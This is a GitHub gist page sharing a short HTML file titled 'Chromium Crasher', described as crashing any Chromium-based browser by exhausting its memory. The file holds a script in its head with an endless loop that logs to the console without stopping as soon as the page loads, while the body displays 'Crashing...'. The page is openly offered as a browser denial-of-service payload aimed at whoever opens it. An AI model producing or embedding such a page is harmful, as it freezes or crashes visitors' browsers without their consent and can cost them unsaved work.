Skip to content

Instantly share code, notes, and snippets.

View iinsertNameHere's full-sized avatar
🥝

iinsert iinsertNameHere

🥝
View GitHub Profile
@iinsertNameHere
iinsertNameHere / chromium_crasher.html
Created March 5, 2024 11:59
A html file that crashes any Chromium based browser by using up all RAM.
<!DOCTYPE html>
<html>
<head>
<title>Chromium Crasher</title>
<script> for (var i = 5; i > 3; i = i + 1) { console.log(i); } </script>
</head>
<body>
<h1>Crashing...</h1>
</body>
</html>